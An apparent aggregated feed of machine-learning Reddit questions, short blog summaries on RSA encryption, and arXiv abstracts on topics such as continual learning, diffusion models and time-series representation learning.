    I'm not sure if this is the right subreddit to ask this on, but I'm creating this chatbot on dialogflow and I made the first intend, but I can't figure out how to enable it. whenever I test it, it shows the intend to be idf, and I can't just change the name of the intend to my current intend so it can recognize all the requests I've included in that intend. how do I do that? submitted by /u/penguinsandpandas00 [link] [comments]  ( 8 min )
    NPC Steven shares his first free-style rap with the world 🤯🎤- Generative NPC update 6
    submitted by /u/Chance_Confection_37 [link] [comments]  ( 8 min )
  • Open

    Microsoft’s AI Watched 100,000,000 Youtube Videos! text input to video and sound
    submitted by /u/keghn [link] [comments]  ( 8 min )
    Best Books to Learn Neural Networks in 2023 for Beginners to advanced
    submitted by /u/Lakshmireddys [link] [comments]  ( 8 min )
  • Open

    Generating and inspecting an RSA private key
    In principle you generate an RSA key by finding two large prime numbers, p and q, and computing n = pq. You could, for example, generate random numbers by rolling dice, then type the numbers into Mathematica to test each for primaility until you find a couple prime numbers of the right size. In practice […] Generating and inspecting an RSA private key first appeared on John D. Cook.  ( 6 min )
    RSA encryption in practice
    At its core, RSA encryption is modular exponentiation. That is, given a message m, the encrypted form of m is x = me mod n where e is a publicly known exponent and n is a product of two large primes. The number n is made public but only the holder of the private key […] RSA encryption in practice first appeared on John D. Cook.  ( 5 min )
    Code to convert words to Major system numbers
    A few days ago I wrote about using the CMU Pronouncing Dictionary to search for words that decode to certain numbers in the Major mnemonic system. You can find a brief description of the Major system in that post. As large as the CMU dictionary is, it did not contain words mapping to some three-digit […] Code to convert words to Major system numbers first appeared on John D. Cook.  ( 6 min )
  • Open

    [D] How to Mathematically Prove that a Neural Network is Converging Faster
    Hello r/MachineLearning! I'm working on understanding how a neural network converges and wish to approach this mathematically. Can anyone recommend resources, papers, or tools that could assist me in proving this? Thank you in advance for your help! Edit: Removed converges faster to remove ambiguity submitted by /u/abystoma [link] [comments]  ( 8 min )
    [D] Transformer for realtime action recognition
    Do you aware of any work for realtime action recognition that use transformer? This is different with conventional transformer in a sense that we don’t have access to future information, so how do we change the training strategy? Also, it’s inefficient if we use the entire history; are there any smart way to select which frame in the past to keep? submitted by /u/Ok_Influence505 [link] [comments]  ( 8 min )
    [[P] Vectara+ Flowise
    u/Vectara is now integrated with r/flowise, so you can easily build no-code GenAI Apps at scale. Check out the video here: https://twitter.com/ofermend/status/1687138158692196352 You can sign up for a free vectara.com account to get started. submitted by /u/ofermend [link] [comments]  ( 8 min )
    Custom Tokenizers - Optimization Opportunity or Waste of Time? [D], [R}
    I've recently started to explore the possibility of working with custom tokenizers. I will preface this by saying I'm not a tokenizer guy. I just don't know that much about their construction. I understand how they work, but I'm probably behind the latest developments in tokenizers. So, I thought it wisest to reach out to the community for advice or clarity. Context: I've collected about 15 GB of data over the last month. It's incredibly clean and well-organized. The core goal of the data is to train a model to solve or assist with a particular development problem. This means that much of my data is a code/natural language mix. It's delimited clearly, and the formatting is uniform. The entire dataset has been normalized and standardized. It's taken me a lot of time to produce and that's…  ( 10 min )
    [R] The Quest to Have Endless Conversations with Llama and ChatGPT 🗣️💬
    ​ https://preview.redd.it/mbkb10icqbgb1.png?width=1400&format=png&auto=webp&s=7a15423060ddfeffe4651340bcc6fd7cf36dde10 I started a blog post series about the limitations of language models for dealing with long texts. Feedback is welcome! submitted by /u/JClub [link] [comments]  ( 8 min )
    [D] Energy efficiency of data centers versus consumer-grade setups for training and inference of LLMs
    Hi everyone, With the recent boom of LLMs, we have seen both ends of the spectrum advance at a very fast pace, from OpenAI GPT4, which runs on huge data centers operated by Azure, to llama.cpp, which runs on consumer laptops. While both have their pros and cons, for instance, open-source models on decentralized compute reduce the need to trust or rely on centralized actors like Cloud providers, the efficiency of running training/inference on personal setups is not often discussed. I am therefore interested in learning how more energy/cost efficient it is to train/serve AI models on data centers vs doing it on personal computers. Do you know if there have been studies? In theory, I guess that several factors, such as economies of scale, use of renewable energy sources in some data centers, such as Canada, advanced cooling systems and advanced hardware, make data centers more cost/energy efficient. I guess some modeling on a precise use case where we fix some variables could help have an idea. For instance, one could ask, what is the energy/cost/time needed to predict 1 billion tokens from a Llama 2 70B in a data center with X amount of A100s, vs on Y different consumer CPU / GPUs. If anyone has references to models or past studies I would be quite interested. Of course, using data centers implies trusting those people, but I am not considering that factor for this discussion as I am focusing on understanding best what is the best setup to have optimal enrgy/cost/time for AI. submitted by /u/Separate-Still3770 [link] [comments]  ( 9 min )
    [D] Nvidia GPU shortage is ‘top gossip’ of Silicon Valley
    submitted by /u/norcalnatv [link] [comments]  ( 8 min )
    ICCV Challenge on Geographical Domain Adaptation [R]
    As part of ICCV 2023 in Paris, this year we are organizing a challenge on solving domain gaps that occur when computer vision models are transferred across geographical locations. The challenge covers three tracks in unsupervised scene adaptation, image adaptation and universal adaptation. The challenge is open to everyone, with attractive prizes for the winners. Check it out at the following links! Challenge Rules and Guidelines: https://geonet-challenge.github.io/ICCV2023/challenge.html Challenge Registration: https://forms.gle/zSZA1iaPD3mZxjyn7 Code and baselines: https://github.com/ViLab-UCSD/GeoNet The training data for the challenge is already available, and the test data will be released to the registered participants. submitted by /u/GeoNetICCV2023 [link] [comments]  ( 8 min )
    [P] MechDesigner Assistant AI: Future Engineers. Looking for communities, groups etc to exchange ideas, experience
    Hi guys Im looking for groups or communities where i could discuss about certain topic. Im a software developer and a mechanical engineer and recently made an app that combines gpt4 model to perform engineering tasks like CAD models creation and performing stress analysis. I would like find people who share the same passion and perhaps would like to discuss about that, exchange the concepts, ideas and visions. Im getting to the point where i will need to implement own trained model and im no ML expert so would be great to discuss about the architecture etc. Here is a demo of my app MechDesigner Assistant AI: Future Engineers Best regards Pyotr submitted by /u/pyotr_vozniak [link] [comments]  ( 9 min )
    [P] Drum Kick Generation app
    Hi, I am a new starter with ML apps and want to build a first app preferably using existing (trained) models. The idea is an app that takes a text description of a wished kick drum (for example: create a 808 kick with enhanced subs and filtered above 15kHz) and then generates a corresponding hifi sample of the description (44,1k or 48k). I would like to learn how to do that with some peers happy to help me. As said this would be my first attempt. About me: I only followed Deep Learning theoretical courses from Andrew Ng and never built or used existing models so I'd appreciate some guidance if you are interested to support. Thanks a lot submitted by /u/freeabt19 [link] [comments]  ( 9 min )
    [D] Human Biological and Spiking Neural Networks. A Literature Review of Recent BNN and SNN Advances)
    submitted by /u/Impressive-Ad-8964 [link] [comments]  ( 8 min )
    [P] Nerf.jl a Real-Time Neural 3D Scene Reconstruction in Pure Julia | Anton Smirnov | JuliaCon 2023
    submitted by /u/Fincho64 [link] [comments]  ( 8 min )
    [D]How do you usually deal with multimodal target variable?
    Popular machine model techniques such as LightGBM and XGBoost output predictions that are unimodally distributed(only one hump) but seem to beat other models specialized to deal with multimodal data. Or am I just wrong? It just doesnt look right. https://preview.redd.it/6xrd7hgm4agb1.png?width=1000&format=png&auto=webp&s=a4518549f609c6436af410ae87a0c6a24cff6ea7 submitted by /u/runawaychicken [link] [comments]  ( 8 min )
    [D] Transformer implementation - help
    Hey I've tried to implement the transformer architecture on my own to understand it better. The outputs look fine (I'm only looking at shapes) and I wanted to know if it's right firstly, and if there is anyway to implement it in a more efficient way. Code - import torch import torch.nn as nn class MultiHeadSelfAttention(nn.Module): def __init__(self, nheads=8, dim=512, bias=True, dropout=0.2): super().__init__() assert dim % nheads == 0, "dimension must be divisible by number of heads" self.nheads = nheads self.dim = dim self.head_dim = dim // nheads self.scale = self.head_dim**-0.5 self.softmax = nn.Softmax(dim=-1) self.dropout = nn.Dropout(dropout) self.to_keys = nn.Linear(dim, self.dim_heads * nheads, bias=bias) self.to_queries = nn.Linear(dim, self.dim_heads * nheads, bias=bias) self.to_values = nn.Linear(dim, self.dim_heads * nheads, bias=bias) self.to_out = nn.Linear(self.dim_heads * nheads, dim, bias=bias) def change_shape(self, x): b_size = x.shape[:-1] return x.reshape(*b_size, self.nheads, self.head_dim) def forward(self, x, mask=True): q = self.change_shape(self.to_queries(x)) k = self.change_shape(self.to_keys(x)) v = self.change_shape(self.to_values(x)) dot_score = q @ k.transpose(-2, -1) * self.scale if mask: tril = torch.tril(torch.ones(dot_score.shape[-2:])) dot_score = dot_score.masked_fill(tril == 0, float("-inf")) attn = self.softmax(attn) attn = self.dropout(attn) out = torch.einsum("bnk,bnd->bnd", attn, v) b_size = out.shape[:-2] out = out.view(*b_size, -1) return self.to_out(out) Thank you! submitted by /u/04RR [link] [comments]  ( 9 min )
    [P] Implement parallel training using the multiprocessing module.
    https://github.com/NoteDancing/Note This project allows you to easily implement parallel training with the multiprocessing module. submitted by /u/NoteDancing [link] [comments]  ( 8 min )
    [R] Forward Process of Diffusion Models
    In the forward process of diffusion models, gaussian noise is added -- when this is done, is the resulting "noisy image" clipped to be within the pixel-value bounds (ie [0, 255] or [0, 1]), or is it allowed to exceed these limits? Clipping makes sense as there is no interpretation for pixel values which exceed these limits. On the other hand, the problem with clipping is that if the added noise is clipped, you are not adding truly gaussian noise, which seems problematic as much of the theory behind diffusion models assumes true gaussian noise. Any ideas about what is done in practice, and whether or not this has implications from a theoretical standpoint? submitted by /u/alkaway [link] [comments]  ( 9 min )
    Team is burning out trying to create a dataset. Any solutions? [D]
    Good Evening ML peeps So I am currently creating a dataset in a team of three. This dataset is aimed to create a object detection model for around 11 classes. We have aimed to label around approx. 4000. Our current workflow is a couple of scripts scraping from Pinterest and using Label Studio for labeling. We labeled approx. 25% to our goal but realized that we are about to burn out. We'd prefer that whatever solution there is is self hosted and not paid. Thoughts? is there some kind of workflow we are missing to create a dataset? submitted by /u/PlanetAcorn [link] [comments]  ( 9 min )
    [D] Document-based QnA without OpenAI?
    I am working on a project that is very popular with the inception of Langchain + GPT applications. However, I want to make it open source and hence don't want to use GPT. So something like Langchain + LLama2, etc. I know currently Langchain only supports GPT but any other ideas are highly appreciated! submitted by /u/vishank97 [link] [comments]  ( 8 min )
    [D] Looking for suggestions / guides on how to switch from OpenAI Embeddings and Pinecone to open-source / self-hosted architecture options.
    Hi all, I'm interested in redesigning my application to utilize an open-source embeddings model and a different vector DB. My current issue with embeddings is that processing large volumes of data into a vector DB using ada-002 is unreliable, with frequent API timeouts occurring or issues interacting with Pinecone. This is super problematic as it's difficult to track which data has / hasn't been stored correctly. I also know that many open-source embeddings models are more performant and will allow for more long term control over my data. However, the advantage of using OpenAI / Pinecone has of course been simplicity in production and not having to worry about queries / retrieval working efficiently. To give context, I'm dealing with a large volume of documents, such that if I were to embed my documents into a FAISS index with a small sentence transformers model, it would constitute 12GB, so a really simple solution like storing within the same application database is probably a no-go. In initiating this switch, I want to know the best approach towards: A) Utilizing an open-source embeddings model in a production context (is it best to host as an API via a cloud provider and what are some considerations I should think about? What's a fast / reliable way of setting this up? I would like prioritise a more simple approach if possible.) B) What Vector DB I should be looking into as an alternative and what's the best way to achieve self-hosted so that it would be equally performant compared to hosted services like pinecone (Docker? AWS?)? submitted by /u/theheffalump2000 [link] [comments]  ( 9 min )
  • Open

    Why isn't there a SARSA equivalent that uses value functions?
    SARSA is a TD algorithm for control (learning optimal policies). In the book it's written like this: image. The idea is to learn the action-value function instead of the value function for a policy that we keep improving (using GPI). Once we learn the converged action-value function for all states, the optimal policy is greedily derived from the action-value function (basically take the most promising action at each state). In contrast, TD for value estimation is written like this: image. Here we keep the policy fixed and just keep iterating over the multiple episodes, whilst refining the value estimate. My question is, why can't we just change TD for value estimation to just greedily update the policy at each stage? That would be in the spirit of generalized policy iteration (GPI) too. In other words, a version of SARSA which doesn't use action-value functions, but instead use value functions? submitted by /u/AstronautVarious3791 [link] [comments]  ( 9 min )
  • Open

    An Unsupervised Machine Learning Approach for Ground-Motion Spectra Clustering and Selection. (arXiv:2212.03188v2 [physics.geo-ph] UPDATED)
    Clustering analysis of sequence data continues to address many applications in engineering design, aided with the rapid growth of machine learning in applied science. This paper presents an unsupervised machine learning algorithm to extract defining characteristics of earthquake ground-motion spectra, also called latent features, to aid in ground-motion selection (GMS). In this context, a latent feature is a low-dimensional machine-discovered spectral characteristic learned through nonlinear relationships of a neural network autoencoder. Machine discovered latent features can be combined with traditionally defined intensity measures and clustering can be performed to select a representative subgroup from a large ground-motion suite. The objective of efficient GMS is to choose characteristic records representative of what the structure will probabilistically experience in its lifetime. Three examples are presented to validate this approach, including the use of synthetic and field recorded ground-motion datasets. The presented deep embedding clustering of ground-motion spectra has three main advantages: 1. defining characteristics the represent the sparse spectral content of ground-motions are discovered efficiently through training of the autoencoder, 2. domain knowledge is incorporated into the machine learning framework with conditional variables in the deep embedding scheme, and 3. method exhibits excellent performance when compared to a benchmark seismic hazard analysis.  ( 2 min )
    End-to-End Reinforcement Learning of Koopman Models for Economic Nonlinear MPC. (arXiv:2308.01674v1 [cs.LG])
    (Economic) nonlinear model predictive control ((e)NMPC) requires dynamic system models that are sufficiently accurate in all relevant state-space regions. These models must also be computationally cheap enough to ensure real-time tractability. Data-driven surrogate models for mechanistic models can be used to reduce the computational burden of (e)NMPC; however, such models are typically trained by system identification for maximum average prediction accuracy on simulation samples and perform suboptimally as part of actual (e)NMPC. We present a method for end-to-end reinforcement learning of dynamic surrogate models for optimal performance in (e)NMPC applications, resulting in predictive controllers that strike a favorable balance between control performance and computational demand. We validate our method on two applications derived from an established nonlinear continuous stirred-tank reactor model. We compare the controller performance to that of MPCs utilizing models trained by the prevailing maximum prediction accuracy paradigm, and model-free neural network controllers trained using reinforcement learning. We show that our method matches the performance of the model-free neural network controllers while consistently outperforming models derived from system identification. Additionally, we show that the MPC policies can react to changes in the control setting without retraining.  ( 2 min )
    Relational Experience Replay: Continual Learning by Adaptively Tuning Task-wise Relationship. (arXiv:2112.15402v3 [cs.LG] UPDATED)
    Continual learning is a promising machine learning paradigm to learn new tasks while retaining previously learned knowledge over streaming training data. Till now, rehearsal-based methods, keeping a small part of data from old tasks as a memory buffer, have shown good performance in mitigating catastrophic forgetting for previously learned knowledge. However, most of these methods typically treat each new task equally, which may not adequately consider the relationship or similarity between old and new tasks. Furthermore, these methods commonly neglect sample importance in the continual training process and result in sub-optimal performance on certain tasks. To address this challenging problem, we propose Relational Experience Replay (RER), a bi-level learning framework, to adaptively tune task-wise relationships and sample importance within each task to achieve a better `stability' and `plasticity' trade-off. As such, the proposed method is capable of accumulating new knowledge while consolidating previously learned old knowledge during continual learning. Extensive experiments conducted on three publicly available datasets (i.e., CIFAR-10, CIFAR-100, and Tiny ImageNet) show that the proposed method can consistently improve the performance of all baselines and surpass current state-of-the-art methods.  ( 2 min )
    Unsupervised Multiplex Graph Learning with Complementary and Consistent Information. (arXiv:2308.01606v1 [cs.LG])
    Unsupervised multiplex graph learning (UMGL) has been shown to achieve significant effectiveness for different downstream tasks by exploring both complementary information and consistent information among multiple graphs. However, previous methods usually overlook the issues in practical applications, i.e., the out-of-sample issue and the noise issue. To address the above issues, in this paper, we propose an effective and efficient UMGL method to explore both complementary and consistent information. To do this, our method employs multiple MLP encoders rather than graph convolutional network (GCN) to conduct representation learning with two constraints, i.e., preserving the local graph structure among nodes to handle the out-of-sample issue, and maximizing the correlation of multiple node representations to handle the noise issue. Comprehensive experiments demonstrate that our proposed method achieves superior effectiveness and efficiency over the comparison methods and effectively tackles those two issues. Code is available at https://github.com/LarryUESTC/CoCoMG.  ( 2 min )
    OpenFlamingo: An Open-Source Framework for Training Large Autoregressive Vision-Language Models. (arXiv:2308.01390v1 [cs.CV])
    We introduce OpenFlamingo, a family of autoregressive vision-language models ranging from 3B to 9B parameters. OpenFlamingo is an ongoing effort to produce an open-source replication of DeepMind's Flamingo models. On seven vision-language datasets, OpenFlamingo models average between 80 - 89% of corresponding Flamingo performance. This technical report describes our models, training data, hyperparameters, and evaluation suite. We share our models and code at https://github.com/mlfoundations/open_flamingo.  ( 2 min )
    Collaborative causal inference on distributed data. (arXiv:2208.07898v2 [stat.ME] UPDATED)
    The development of technologies for causal inference with the privacy preservation of distributed data has attracted considerable attention in recent years. To address this issue, we propose a data collaboration quasi-experiment (DC-QE) that enables causal inference from distributed data with privacy preservation. In our method, first, local parties construct dimensionality-reduced intermediate representations from the private data. Second, they share intermediate representations, instead of private data for privacy preservation. Third, propensity scores were estimated from the shared intermediate representations. Finally, the treatment effects were estimated from propensity scores. Our method can reduce both random errors and biases, whereas existing methods can only reduce random errors in the estimation of treatment effects. Through numerical experiments on both artificial and real-world data, we confirmed that our method can lead to better estimation results than individual analyses. Dimensionality-reduction loses some of the information in the private data and causes performance degradation. However, we observed that in the experiments, sharing intermediate representations with many parties to resolve the lack of subjects and covariates, our method improved performance enough to overcome the degradation caused by dimensionality-reduction. With the spread of our method, intermediate representations can be published as open data to help researchers find causalities and accumulated as a knowledge base.  ( 2 min )
    Sharing to learn and learning to share -- Fitting together Meta-Learning, Multi-Task Learning, and Transfer Learning: A meta review. (arXiv:2111.12146v6 [cs.LG] UPDATED)
    Integrating knowledge across different domains is an essential feature of human learning. Learning paradigms such as transfer learning, meta learning, and multi-task learning reflect the human learning process by exploiting the prior knowledge for new tasks, encouraging faster learning and good generalization for new tasks. This article gives a detailed view of these learning paradigms and their comparative analysis. The weakness of one learning algorithm turns out to be a strength of another, and thus merging them is a prevalent trait in the literature. There are numerous research papers that focus on each of these learning paradigms separately and provide a comprehensive overview of them. However, this article provides a review of research studies that combine (two of) these learning algorithms. This survey describes how these techniques are combined to solve problems in many different fields of study, including computer vision, natural language processing, hyperspectral imaging, and many more, in supervised setting only. As a result, the global generic learning network an amalgamation of meta learning, transfer learning, and multi-task learning is introduced here, along with some open research questions and future research directions in the multi-task setting.  ( 3 min )
    Multimodality Helps Unimodality: Cross-Modal Few-Shot Learning with Multimodal Models. (arXiv:2301.06267v4 [cs.CV] UPDATED)
    The ability to quickly learn a new task with minimal instruction - known as few-shot learning - is a central aspect of intelligent agents. Classical few-shot benchmarks make use of few-shot samples from a single modality, but such samples may not be sufficient to characterize an entire concept class. In contrast, humans use cross-modal information to learn new concepts efficiently. In this work, we demonstrate that one can indeed build a better ${\bf visual}$ dog classifier by ${\bf read}$ing about dogs and ${\bf listen}$ing to them bark. To do so, we exploit the fact that recent multimodal foundation models such as CLIP are inherently cross-modal, mapping different modalities to the same representation space. Specifically, we propose a simple cross-modal adaptation approach that learns from few-shot examples spanning different modalities. By repurposing class names as additional one-shot training samples, we achieve SOTA results with an embarrassingly simple linear classifier for vision-language adaptation. Furthermore, we show that our approach can benefit existing methods such as prefix tuning, adapters, and classifier ensembling. Finally, to explore other modalities beyond vision and language, we construct the first (to our knowledge) audiovisual few-shot benchmark and use cross-modal training to improve the performance of both image and audio classification.  ( 3 min )
    An Effective LSTM-DDPM Scheme for Energy Theft Detection and Forecasting in Smart Grid. (arXiv:2307.16149v2 [cs.LG] UPDATED)
    Energy theft detection (ETD) and energy consumption forecasting (ECF) are two interconnected challenges in smart grid systems. Addressing these issues collectively is crucial for ensuring system security. This paper addresses the interconnected challenges of ETD and ECF in smart grid systems. The proposed solution combines long short-term memory (LSTM) and a denoising diffusion probabilistic model (DDPM) to generate input reconstruction and forecasting. By leveraging the reconstruction and forecasting errors, the system identifies instances of energy theft, with the methods based on reconstruction error and forecasting error complementing each other in detecting different types of attacks. Through extensive experiments on real-world and synthetic datasets, the proposed scheme outperforms baseline methods in ETD and ECF problems. The ensemble method significantly enhances ETD performance, accurately detecting energy theft attacks that baseline methods fail to detect. The research offers a comprehensive and effective solution for addressing ETD and ECF challenges, demonstrating promising results and improved security in smart grid systems.  ( 2 min )
    Bag of Policies for Distributional Deep Exploration. (arXiv:2308.01759v1 [cs.LG])
    Efficient exploration in complex environments remains a major challenge for reinforcement learning (RL). Compared to previous Thompson sampling-inspired mechanisms that enable temporally extended exploration, i.e., deep exploration, we focus on deep exploration in distributional RL. We develop here a general purpose approach, Bag of Policies (BoP), that can be built on top of any return distribution estimator by maintaining a population of its copies. BoP consists of an ensemble of multiple heads that are updated independently. During training, each episode is controlled by only one of the heads and the collected state-action pairs are used to update all heads off-policy, leading to distinct learning signals for each head which diversify learning and behaviour. To test whether optimistic ensemble method can improve on distributional RL as did on scalar RL, by e.g. Bootstrapped DQN, we implement the BoP approach with a population of distributional actor-critics using Bayesian Distributional Policy Gradients (BDPG). The population thus approximates a posterior distribution of return distributions along with a posterior distribution of policies. Another benefit of building upon BDPG is that it allows to analyze global posterior uncertainty along with local curiosity bonus simultaneously for exploration. As BDPG is already an optimistic method, this pairing helps to investigate if optimism is accumulatable in distributional RL. Overall BoP results in greater robustness and speed during learning as demonstrated by our experimental results on ALE Atari games.  ( 2 min )
    Unsupervised Representation Learning for Time Series: A Review. (arXiv:2308.01578v1 [cs.LG])
    Unsupervised representation learning approaches aim to learn discriminative feature representations from unlabeled data, without the requirement of annotating every sample. Enabling unsupervised representation learning is extremely crucial for time series data, due to its unique annotation bottleneck caused by its complex characteristics and lack of visual cues compared with other data modalities. In recent years, unsupervised representation learning techniques have advanced rapidly in various domains. However, there is a lack of systematic analysis of unsupervised representation learning approaches for time series. To fill the gap, we conduct a comprehensive literature review of existing rapidly evolving unsupervised representation learning approaches for time series. Moreover, we also develop a unified and standardized library, named ULTS (i.e., Unsupervised Learning for Time Series), to facilitate fast implementations and unified evaluations on various models. With ULTS, we empirically evaluate state-of-the-art approaches, especially the rapidly evolving contrastive learning methods, on 9 diverse real-world datasets. We further discuss practical considerations as well as open research challenges on unsupervised representation learning for time series to facilitate future research in this field.
    CT Perfusion is All We Need: 4D CNN Segmentation of Penumbra and Core in Patient With Suspected Ischemic Stroke. (arXiv:2303.08757v2 [eess.IV] UPDATED)
    Precise and fast prediction methods for ischemic areas comprised of dead tissue, core, and salvageable tissue, penumbra, in acute ischemic stroke (AIS) patients are of significant clinical interest. They play an essential role in improving diagnosis and treatment planning. Computed Tomography (CT) scan is one of the primary modalities for early assessment in patients with suspected AIS. CT Perfusion (CTP) is often used as a primary assessment to determine stroke location, severity, and volume of ischemic lesions. Current automatic segmentation methods for CTP mostly use already processed 3D parametric maps conventionally used for clinical interpretation by radiologists as input. Alternatively, the raw CTP data is used on a slice-by-slice basis as 2D+time input, where the spatial information over the volume is ignored. In addition, these methods are only interested in segmenting core regions, while predicting penumbra can be essential for treatment planning. This paper investigates different methods to utilize the entire 4D CTP as input to fully exploit the spatio-temporal information, leading us to propose a novel 4D convolution layer. Our comprehensive experiments on a local dataset of 152 patients divided into three groups show that our proposed models generate more precise results than other methods explored. Adopting the proposed 4D mJ-Net, a Dice Coefficient of 0.53 and 0.23 is achieved for segmenting penumbra and core areas, respectively. The code is available on https://github.com/Biomedical-Data-Analysis-Laboratory/4D-mJ-Net.git.
    Optimal Training of Mean Variance Estimation Neural Networks. (arXiv:2302.08875v2 [stat.ML] UPDATED)
    This paper focusses on the optimal implementation of a Mean Variance Estimation network (MVE network) (Nix and Weigend, 1994). This type of network is often used as a building block for uncertainty estimation methods in a regression setting, for instance Concrete dropout (Gal et al., 2017) and Deep Ensembles (Lakshminarayanan et al., 2017). Specifically, an MVE network assumes that the data is produced from a normal distribution with a mean function and variance function. The MVE network outputs a mean and variance estimate and optimizes the network parameters by minimizing the negative loglikelihood. In our paper, we present two significant insights. Firstly, the convergence difficulties reported in recent work can be relatively easily prevented by following the simple yet often overlooked recommendation from the original authors that a warm-up period should be used. During this period, only the mean is optimized with a fixed variance. We demonstrate the effectiveness of this step through experimentation, highlighting that it should be standard practice. As a sidenote, we examine whether, after the warm-up, it is beneficial to fix the mean while optimizing the variance or to optimize both simultaneously. Here, we do not observe a substantial difference. Secondly, we introduce a novel improvement of the MVE network: separate regularization of the mean and the variance estimate. We demonstrate, both on toy examples and on a number of benchmark UCI regression data sets, that following the original recommendations and the novel separate regularization can lead to significant improvements.
    Reverse Stable Diffusion: What prompt was used to generate this image?. (arXiv:2308.01472v1 [cs.CV])
    Text-to-image diffusion models such as Stable Diffusion have recently attracted the interest of many researchers, and inverting the diffusion process can play an important role in better understanding the generative process and how to engineer prompts in order to obtain the desired images. To this end, we introduce the new task of predicting the text prompt given an image generated by a generative diffusion model. We combine a series of white-box and black-box models (with and without access to the weights of the diffusion network) to deal with the proposed task. We propose a novel learning framework comprising of a joint prompt regression and multi-label vocabulary classification objective that generates improved prompts. To further improve our method, we employ a curriculum learning procedure that promotes the learning of image-prompt pairs with lower labeling noise (i.e. that are better aligned), and an unsupervised domain-adaptive kernel learning method that uses the similarities between samples in the source and target domains as extra features. We conduct experiments on the DiffusionDB data set, predicting text prompts from images generated by Stable Diffusion. Our novel learning framework produces excellent results on the aforementioned task, yielding the highest gains when applied on the white-box model. In addition, we make an interesting discovery: training a diffusion model on the prompt generation task can make the model generate images that are much better aligned with the input prompts, when the model is directly reused for text-to-image generation.
    Relationship between Batch Size and Number of Steps Needed for Nonconvex Optimization of Stochastic Gradient Descent using Armijo Line Search. (arXiv:2307.13831v2 [cs.LG] UPDATED)
    Stochastic gradient descent (SGD) is the simplest deep learning optimizer with which to train deep neural networks. While SGD can use various learning rates, such as constant or diminishing rates, the previous numerical results showed that SGD performs better than other deep learning optimizers using when it uses learning rates given by line search methods. In this paper, we perform a convergence analysis on SGD with a learning rate given by an Armijo line search for nonconvex optimization. The analysis indicates that the upper bound of the expectation of the squared norm of the full gradient becomes small when the number of steps and the batch size are large. Next, we show that, for SGD with the Armijo-line-search learning rate, the number of steps needed for nonconvex optimization is a monotone decreasing convex function of the batch size; that is, the number of steps needed for nonconvex optimization decreases as the batch size increases. Furthermore, we show that the stochastic first-order oracle (SFO) complexity, which is the stochastic gradient computation cost, is a convex function of the batch size; that is, there exists a critical batch size that minimizes the SFO complexity. Finally, we provide numerical results that support our theoretical results. The numerical results indicate that the number of steps needed for training deep neural networks decreases as the batch size increases and that there exist the critical batch sizes that can be estimated from the theoretical results.
    An efficient, provably exact, practical algorithm for the 0-1 loss linear classification problem. (arXiv:2306.12344v2 [cs.LG] UPDATED)
    Algorithms for solving the linear classification problem have a long history, dating back at least to 1936 with linear discriminant analysis. For linearly separable data, many algorithms can obtain the exact solution to the corresponding 0-1 loss classification problem efficiently, but for data which is not linearly separable, it has been shown that this problem, in full generality, is NP-hard. Alternative approaches all involve approximations of some kind, including the use of surrogates for the 0-1 loss (for example, the hinge or logistic loss) or approximate combinatorial search, none of which can be guaranteed to solve the problem exactly. Finding efficient algorithms to obtain an exact i.e. globally optimal solution for the 0-1 loss linear classification problem with fixed dimension, remains an open problem. In research we report here, we detail the rigorous construction of a new algorithm, incremental cell enumeration (ICE), that can solve the 0-1 loss classification problem exactly in polynomial time. We prove correctness using concepts from the theory of hyperplane arrangements and oriented matroids. We demonstrate the effectiveness of this algorithm on synthetic and real-world datasets, showing optimal accuracy both in and out-of-sample, in practical computational time. We also empirically demonstrate how the use of approximate upper bound leads to polynomial time run-time improvements to the algorithm whilst retaining exactness. To our knowledge, this is the first, rigorously-proven polynomial time, practical algorithm for this long-standing problem.
    Random Planted Forest: a directly interpretable tree ensemble. (arXiv:2012.14563v3 [stat.ML] UPDATED)
    We introduce a novel interpretable tree based algorithm for prediction in a regression setting. Our motivation is to estimate the unknown regression function from a functional decomposition perspective in which the functional components correspond to lower order interaction terms. The idea is to modify the random forest algorithm by keeping certain leaves after they are split instead of deleting them. This leads to non-binary trees which we refer to as planted trees. An extension to a forest leads to our random planted forest algorithm. Additionally, the maximum number of covariates which can interact within a leaf can be bounded. If we set this interaction bound to one, the resulting estimator is a sum of one-dimensional functions. In the other extreme case, if we do not set a limit, the resulting estimator and corresponding model place no restrictions on the form of the regression function. In a simulation study we find encouraging prediction and visualisation properties of our random planted forest method. We also develop theory for an idealized version of random planted forests in cases where the interaction bound is low. We show that if it is smaller than three, the idealized version achieves asymptotically optimal convergence rates up to a logarithmic factor. Code is available on GitHub https://github.com/PlantedML/randomPlantedForest.
    MIRACLE: Multi-task Learning based Interpretable Regulation of Autoimmune Diseases through Common Latent Epigenetics. (arXiv:2306.13866v2 [cs.LG] UPDATED)
    DNA methylation is a crucial regulator of gene transcription and has been linked to various diseases, including autoimmune diseases and cancers. However, diagnostics based on DNA methylation face challenges due to large feature sets and small sample sizes, resulting in overfitting and suboptimal performance. To address these issues, we propose MIRACLE, a novel interpretable neural network that leverages autoencoder-based multi-task learning to integrate multiple datasets and jointly identify common patterns in DNA methylation. MIRACLE's architecture reflects the relationships between methylation sites, genes, and pathways, ensuring biological interpretability and meaningfulness. The network comprises an encoder and a decoder, with a bottleneck layer representing pathway information as the basic unit of heredity. Customized defined MaskedLinear Layer is constrained by site-gene-pathway graph adjacency matrix information, which provides explainability and expresses the site-gene-pathway hierarchical structure explicitly. And from the embedding, there are different multi-task classifiers to predict diseases. Tested on six datasets, including rheumatoid arthritis, systemic lupus erythematosus, multiple sclerosis, inflammatory bowel disease, psoriasis, and type 1 diabetes, MIRACLE demonstrates robust performance in identifying common functions of DNA methylation across different phenotypes, with higher accuracy in prediction dieseases than baseline methods. By incorporating biological prior knowledge, MIRACLE offers a meaningful and interpretable framework for DNA methylation data analysis in the context of autoimmune diseases.
    Nearest Neighbour with Bandit Feedback. (arXiv:2306.13773v2 [cs.LG] UPDATED)
    In this paper we adapt the nearest neighbour rule to the contextual bandit problem. Our algorithm handles the fully adversarial setting in which no assumptions at all are made about the data-generation process. When combined with a sufficiently fast data-structure for (perhaps approximate) adaptive nearest neighbour search, such as a navigating net, our algorithm is extremely efficient - having a per trial running time polylogarithmic in both the number of trials and actions, and taking only quasi-linear space.
    VertexSerum: Poisoning Graph Neural Networks for Link Inference. (arXiv:2308.01469v1 [cs.LG])
